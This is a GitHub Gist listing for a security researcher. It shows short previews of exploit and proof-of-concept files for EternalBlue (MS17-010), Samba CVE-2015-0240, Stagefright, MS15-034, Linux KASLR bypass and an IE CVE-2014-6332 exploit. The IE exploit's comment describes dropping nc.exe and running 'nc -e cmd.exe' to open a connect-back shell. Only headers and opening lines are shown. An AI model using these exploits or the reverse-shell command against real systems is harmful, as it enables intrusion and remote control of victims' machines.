Skip to content

Instantly share code, notes, and snippets.

Avatar

Worawit Wangwarunyoo worawit

View GitHub Profile
@worawit
worawit / ildumper_script_reader.py
Last active Dec 6, 2019
ghidra script for read script.py from Il2CppDumper
View ildumper_script_reader.py
# -*- coding: utf-8 -*-
import ghidra.program.model.symbol.SourceType
import re
functionManager = currentProgram.getFunctionManager()
#minAddress = currentProgram.getMinAddress()
baseAddress = currentProgram.getImageBase()
USER_DEFINED = ghidra.program.model.symbol.SourceType.USER_DEFINED
View break_linux_kaslr_nopti.c
/*
This PoC is based on http://www.immunityinc.com/downloads/x86leaks_old.pdf
The PoC finds direct physical map and kernel text address in Linux kernel without PTI on Intel x64.
The PoC might not work correctly in VM. For example, this PoC cannot find correct direct physical map
address in KVM. The reason is in https://www.kernel.org/doc/Documentation/virtual/kvm/mmu.txt
$ ./break_linux_kaslr_nopti
@worawit
worawit / eternalblue_merge_shellcode.py
Last active Nov 28, 2021
Windows x64 and x86 kernel shellcode for eternalblue exploit
View eternalblue_merge_shellcode.py
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@worawit
worawit / eternalblue8_exploit.py
Last active Oct 3, 2021
Eternalblue exploit for Windows 8/2012
View eternalblue8_exploit.py
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@worawit
worawit / eternalblue7_exploit.py
Last active Sep 6, 2021
Eternalblue exploit for Windows 7/2008
View eternalblue7_exploit.py
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
View sf-itunes-poc.py
#!/usr/bin/python
"""
Stagefright PoC for https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c
"""
from struct import pack
def create_box(atom_type, data):
return pack("!I", len(data)+4+4) + atom_type + data
@worawit
worawit / http_sys_pseudo.c
Last active Jul 30, 2021
MS15-034 (CVE-2015-1635) PoCs
View http_sys_pseudo.c
/*
Pseudo code in HTTP.sys to understand flow related to MS15-034
All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone want to know what function are patched.
Just open patched version and find all functions reference to RtlULongLongAdd().
*/
@worawit
worawit / cve-2015-0240_samba_exploit.py
Created Apr 10, 2015
Exploit for Samba vulnerabilty (CVE-2015-0240)
View cve-2015-0240_samba_exploit.py
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@worawit
worawit / cve-2015-0240_samba_poc
Last active Mar 5, 2021
PoC for Samba vulnerabilty (CVE-2015-0240)
View cve-2015-0240_samba_poc
#!/usr/bin/python
"""
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya
This PoC does only triggering the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
@worawit
worawit / cve-2014-6332_exploit.html
Last active Oct 30, 2021
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
View cve-2014-6332_exploit.html
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)